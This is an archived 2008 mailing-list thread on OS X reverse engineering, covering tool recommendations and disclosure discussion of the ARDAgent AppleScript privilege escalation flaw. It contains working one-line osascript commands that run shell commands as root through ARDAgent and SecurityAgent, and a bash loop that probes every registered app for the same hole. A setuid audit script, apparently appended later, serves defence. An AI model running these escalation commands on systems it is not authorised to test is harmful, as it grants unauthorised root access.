From nummish at 0x90.org Wed Jun 4 14:13:39 2008
From: nummish at 0x90.org (nummish)
Date: Wed, 4 Jun 2008 13:13:39 -0500
Subject: [XSO] Tools
Message-ID:

Hey all, I'll be presenting a primer to reversing on OS X next weekend at REcon (http://recon.cx). Part of my slides include a list of current tools available to aid a reverser on OSX.

So far I have:

otool (stock install)
otx (http://otx.osxninja.com/)
Hex Fiend (http://ridiculousfish.com/hexfiend/)
0xED (http://www.suavetech.com/0xed/0xed.html)
RE:Trace (http://re-tracer.blogspot.com/)
IDA Pro (http://hex-rays.com/idapro/)

scripts:

itsme's objc fixer (http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
fileoffset's otx parser (http://fileoffset.blogspot.com/2008/02/lua-script.html)

Are there any more obvious tools (file, gdb, etc) I'm missing that deserve a mention? Anything obscure that is a huge timesaver?

Also, if any of these are your tools, and you'd prefer I use a different URL, can you let me know as well?

Thanks.


From DAVID.G.WESTON at saic.com Wed Jun 4 14:16:35 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Wed, 04 Jun 2008 11:16:35 -0700
Subject: [XSO] Tools
In-Reply-To:
Message-ID:

We should have reDBG (ruby programmatic debugger for OS X) ready at RECON.

You might also want to include Charlie Miller's port of PaiMei pyDBG, which really does exist.

--Dave

Thanks,
David Weston
Security Engineer
Science Application International Corporation
Web: http://www.saic.com/infosec
Email: DAVID.G.WESTON at saic.com
Office: 858-826-5435
Cell: 310-866-9713


From itsme at xs4all.nl Wed Jun 4 16:05:34 2008
From: itsme at xs4all.nl (itsme)
Date: Wed, 04 Jun 2008 22:05:34 +0200
Subject: [XSO] Tools
In-Reply-To:
References:
Message-ID: <4846F58E.7090307@xs4all.nl>

this was very useful:
http://www.dribin.org/dave/blog/archives/2006/04/22/tracing_objc/

also
http://code-dump.sourceforge.net/
http://www.codethecode.com/projects/class-dump/

more osx hacking links:
http://www.phrack.com/issues.html?issue=63&id=16&mode=txt
http://unixjunkie.blogspot.com/
http://forums.accessroot.com/index.php?showforum=39

willem


From DAVID.G.WESTON at saic.com Thu Jun 5 15:17:21 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Thu, 05 Jun 2008 12:17:21 -0700
Subject: [XSO] Tools
In-Reply-To: <4846F58E.7090307@xs4all.nl>
Message-ID:

Fusil is a file fuzzer which now has OS X support!!

http://fusil.hachoir.org/trac


From DAVID.G.WESTON at saic.com Thu Jun 5 16:52:02 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Thu, 05 Jun 2008 13:52:02 -0700
Subject: [XSO] Tools
In-Reply-To:
Message-ID:

Also don't forget the programmatic debugger vtrace @ www.kenshoto.com/vtrace

Also pygdb http://code.google.com/p/pygdb/


From nummish at 0x90.org Tue Jun 17 15:15:56 2008
From: nummish at 0x90.org (nummish)
Date: Tue, 17 Jun 2008 14:15:56 -0500
Subject: [XSO] post-REcon 2008
Message-ID:

Just a quick note that I've put my slides/code up from recon. The structure of the code is sort of a scratchpad for the reversing I've been doing, so it's not necessarily thorough, and it isn't totally a run-once-and-forget script; some of it's designed for interactive fixups along the way.

In my slides I refer to RE:Trace; the new link appears to be up now at http://poppopret.org .. if you haven't taken a look at this talk/toolset, you really should.

It looks like the subscription size for the list jumped a bit over the weekend, so hello to everyone who was at my presentation.


From nummish at 0x90.org Tue Jun 17 18:56:38 2008
From: nummish at 0x90.org (nummish)
Date: Tue, 17 Jun 2008 17:56:38 -0500
Subject: [XSO] post-REcon 2008
In-Reply-To:
References:
Message-ID:

I seem to have forgotten to include the link to the slides. They're at http://www.0x90.org/releases/REcon2008_iHood.zip


From sliderule at gmail.com Fri Jun 20 08:41:57 2008
From: sliderule at gmail.com (Poindexter Frink)
Date: Fri, 20 Jun 2008 08:41:57 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
Message-ID: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>

Are there archives here? I joined this list today to see if there was chatter re: subject.

% osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Needs to be run by a user logged in to the windowing system. If wrong user, message:

_RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

Then after a timeout delay it returns with an error:

execution error: ARDAgent got an error: Connection is invalid. (-609)

Trojan vector via .app file + mail.

Some machines report errors:

23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

Errors occurred on a MacBook Pro running 10.5.3, an iBook running 10.4.11 and a g5 PPC OS X Server running 10.4.11 (Server build).

Easily fixable.


From sliderule at gmail.com Fri Jun 20 10:08:33 2008
From: sliderule at gmail.com (Poindexter Frink)
Date: Fri, 20 Jun 2008 10:08:33 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
Message-ID: <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>

A brief apology if this is not considered on-topic for this list.


From nummish at 0x90.org Fri Jun 20 12:28:55 2008
From: nummish at 0x90.org (nummish)
Date: Fri, 20 Jun 2008 11:28:55 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
Message-ID:

On Fri, Jun 20, 2008 at 7:41 AM, Poindexter Frink wrote:
> Are there archives here?

Archives are public on http://0x90.org/pipermail/xso/


From m4cpunk at gmail.com Sat Jun 21 02:55:09 2008
From: m4cpunk at gmail.com (Dalton Cummings)
Date: Sat, 21 Jun 2008 01:55:09 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com> <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
Message-ID: <485CA5CD.2030708@gmail.com>

Seems plenty on topic to me.

While scripting this bug to test other apps on the system, I was able to get SecurityAgent.app to execute commands as securityagent. I failed to reproduce the issue outside of the Python interactive prompt. Maybe someone else could have some fun. Tested on a PowerPC iMac G4 running Mac OS X v10.4.11.

osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'

--Dalton

Poindexter Frink wrote:
> A brief apology if this is not considered on-topic for this list.


From andre.ludwig at gmail.com Sat Jun 21 14:39:37 2008
From: andre.ludwig at gmail.com (Andre Ludwig)
Date: Sat, 21 Jun 2008 14:39:37 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <485CA5CD.2030708@gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com> <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com> <485CA5CD.2030708@gmail.com>
Message-ID: <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>

http://www.macshadows.com/forums/index.php?showtopic=8640&st=530

Some interesting stuff there.

Dre


From m4cpunk at gmail.com Sun Jun 22 20:06:13 2008
From: m4cpunk at gmail.com (Dalton Cummings)
Date: Sun, 22 Jun 2008 19:06:13 -0500
Subject: [XSO] Debugger Project
Message-ID: <485EE8F5.8090201@gmail.com>

As I do every year, I'm picking up some projects to work on for the summer. This year I thought it'd be really fun to play with debugging and see how it all works. The issue, however, isn't with debugging, it's with disassembly.

Specifically, I'm looking for a PowerPC disassembly library that's pretty easy to use, written in C, C++, or Objective-C. I've done tons of Googling and haven't found a whole lot. Eventually the project will support Intel Macs, so it would be nice if the library could be ported to support both, but right now I'm really just focusing on PowerPC Macs.

So if anybody has any ideas or could point me in the right direction, I'd be truly thankful. :-)

Thanks,
Dalton


From dblyth at gmail.com Mon Jun 23 02:44:22 2008
From: dblyth at gmail.com (David Blyth)
Date: Sun, 22 Jun 2008 23:44:22 -0700
Subject: [XSO] Debugger Project
In-Reply-To: <485EE8F5.8090201@gmail.com>
References: <485EE8F5.8090201@gmail.com>
Message-ID: <3b16b5700806222344s649bce7j15a557373c25b398@mail.gmail.com>

The source code to otool is available, and I believe it supports disassembly for intel and ppc.

http://www.opensource.apple.com/darwinsource/10.5.3/cctools-667.3/otool/

Let me know if that seems helpful -- I didn't dig through the source very much.

David


From gammah at gmail.com Mon Jun 23 15:20:09 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:20:09 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com> <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com> <485CA5CD.2030708@gmail.com> <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
Message-ID:

I was looking for a way to "tell app"s to do stuff, and came up with this:

Beware this may lock you out of your machine, so make sure you have ssh running or something...

This is a bash loop:

for x in `/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep identifier | sed -e's/.*identifier: *\(.*\)(.*).*/\1/' | sort -u` ; do ( echo "App ID:" $x ; osascript -e 'tell app id "'${x}'" to do shell script "id"'; ) >> osascript.log ; done

Looks like doing tell app id com.apple.LockScreen to do shell script id will lock your OSX UI out with the nice giant padlock icon that they use in screen sharing to lock out the local user.

This loop got uid 0 via ARDAgent on a box still vuln to the ARDAgent issue. It did not find a second one.

I started out looking for setuid binaries at paths matching Myapp.app/Contents/Macos/Myapp -- there seemed to be none that were setuid iirc -- there were a few setgid tho. That search was done like so (regex quoted and the -o grouped so the shell and find read it as intended):

find / -type d -regex '.*\.app' -print -exec find {} \( -perm -4000 -o -perm -2000 \) \;

In my testing, I have not yet been able to get a setgid procview process run from any of the setgid binaries (with this stupid applescript stuff).


From gammah at gmail.com Mon Jun 23 15:29:04 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:29:04 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To:
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com> <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com> <485CA5CD.2030708@gmail.com> <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
Message-ID:

So the setuid/gid binaries inside app bundles looked like this list on my target box:

-rwsrwxr-x 1 root wheel 55344 Oct 8 2007 /Applications/System Preferences.app/Contents/Resources/installAssistant
-rwsr-xr-x 1 root admin 119760 Dec 19 2007 /Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool
-rwsr-xr-x 1 root admin 83200 Jan 22 21:16 /Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy
-rwsr-xr-x 1 root admin 55760 Sep 24 2007 /Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool
-rwxr-sr-x 1 root procmod 194944 Sep 24 2007 /Developer/Applications/Performance Tools/CHUD/Saturn.app/Contents/MacOS/Saturn
-rwxr-sr-x 1 root procmod 659168 Sep 24 2007 /Developer/Applications/Performance Tools/Shark.app/Contents/MacOS/Shark
-rwsr-sr-x 1 root wheel 18292 Sep 24 2007 /System/Library/CoreServices/Expansion Slot Utility.app/Contents/Resources/PCIELaneConfigTool
-rwsr-xr-x 1 root wheel 38432 Jan 25 15:54 /System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
-rwsr-xr-x 1 root wheel 55808 Sep 23 2007 /System/Library/CoreServices/SecurityFixer.app/Contents/Resources/securityFixerTool
-rws--x--x 1 root daemon 65008 Feb 26 22:52 /System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp

Looks like Saturn, Shark, ARDAgent, and check_afp follow the pattern I think is vulnerable, namely, they reside at .app/Contents/MacOS/

Shark and Saturn are dev tools, and are only setgid procview, since they are debug-like tools. It seems to me that the setgid bit isn't honored when doing applescript, because none of these apps report an elevated gid.

check_afp is the only other setuid binary, but doesn't seem to understand do shell script...


From gammah at gmail.com Mon Jun 23 15:29:45 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:29:45 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To:
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com> <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com> <485CA5CD.2030708@gmail.com> <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
Message-ID:

Sorry for what appear to be broken long lines...
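The pattern singled out in the listing above (a setuid or setgid executable sitting at <Bundle>.app/Contents/MacOS/) is the thing a defender wants to inventory on their own machines. The script below is an added example and not code from the thread or from any of its posters: a POSIX shell helper that reads "ls -l" style lines and flags only the entries that both carry an s-bit and live under an .app bundle's Contents/MacOS directory, plus a corrected form of the find from the earlier post that performs the same check against a live filesystem. The sample listing reuses four lines from the post above and adds one constructed non-setuid entry (Safari) as a negative case; the function names flag_bundle_setid, audit_live and count_sample_hits are my own.

```shell
#!/bin/sh
# Added audit helper (not from the thread). Flags setuid/setgid executables
# under <Bundle>.app/Contents/MacOS/, the layout the posts above single out.

# flag_bundle_setid: read "ls -l" style lines on stdin and print one line
# "<flags><TAB><path>" for each entry that has the setuid or setgid bit set
# AND sits under an .app bundle's Contents/MacOS directory.
flag_bundle_setid() {
    awk '
    NF >= 9 {
        mode = $1
        # The path is fields 9..NF rejoined: bundle paths often contain spaces.
        path = $9
        for (i = 10; i <= NF; i++) path = path " " $i
        # Mode string layout: [type][user rwx][group rwx][other rwx];
        # position 4 is the user execute slot (s = setuid), position 7 the
        # group execute slot (s = setgid).
        u = substr(mode, 4, 1); g = substr(mode, 7, 1)
        setuid = (u == "s" || u == "S")
        setgid = (g == "s" || g == "S")
        if (!(setuid || setgid)) next
        if (path !~ /\.app\/Contents\/MacOS\//) next
        flags = ""
        if (setuid) flags = "setuid"
        if (setgid) flags = (flags == "" ? "setgid" : flags "+setgid")
        printf "%s\t%s\n", flags, path
    }'
}

# audit_live: the same check on a live system. This is a corrected form of
# the find from the earlier post: the -o is parenthesised so it binds as
# intended, and the match is restricted to Contents/MacOS inside a bundle.
# Defaults to scanning from /; pass a directory to narrow the scan.
audit_live() {
    root="${1:-/}"
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) \
        -path '*.app/Contents/MacOS/*' -print 2>/dev/null
}

# Sample listing: four lines copied from the post above plus one constructed
# entry (Safari) that has no s-bit and must not be flagged.
SAMPLE_LISTING='-rwsrwxr-x 1 root wheel 55344 Oct 8 2007 /Applications/System Preferences.app/Contents/Resources/installAssistant
-rwxr-sr-x 1 root procmod 659168 Sep 24 2007 /Developer/Applications/Performance Tools/Shark.app/Contents/MacOS/Shark
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
-rws--x--x 1 root daemon 65008 Feb 26 22:52 /System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp
-rwxr-xr-x 1 root wheel 4096 Jan 1 2008 /Applications/Safari.app/Contents/MacOS/Safari'

# count_sample_hits: number of flagged entries in the sample listing.
# installAssistant is setuid but lives in Contents/Resources, and Safari has
# no s-bit, so only Shark, ARDAgent and check_afp are reported (3 hits).
count_sample_hits() {
    printf '%s\n' "$SAMPLE_LISTING" | flag_bundle_setid | grep -c .
}

# Usage:
#   printf '%s\n' "$SAMPLE_LISTING" | flag_bundle_setid
#   audit_live /Applications
```

Running the sample through flag_bundle_setid reports Shark as setgid and ARDAgent and check_afp as setuid; the setuid helpers under Contents/Resources in the post are deliberately not reported, since they are not the bundle's main executable and so are not the case the thread is discussing. audit_live is the same test applied to real paths rather than a pasted listing.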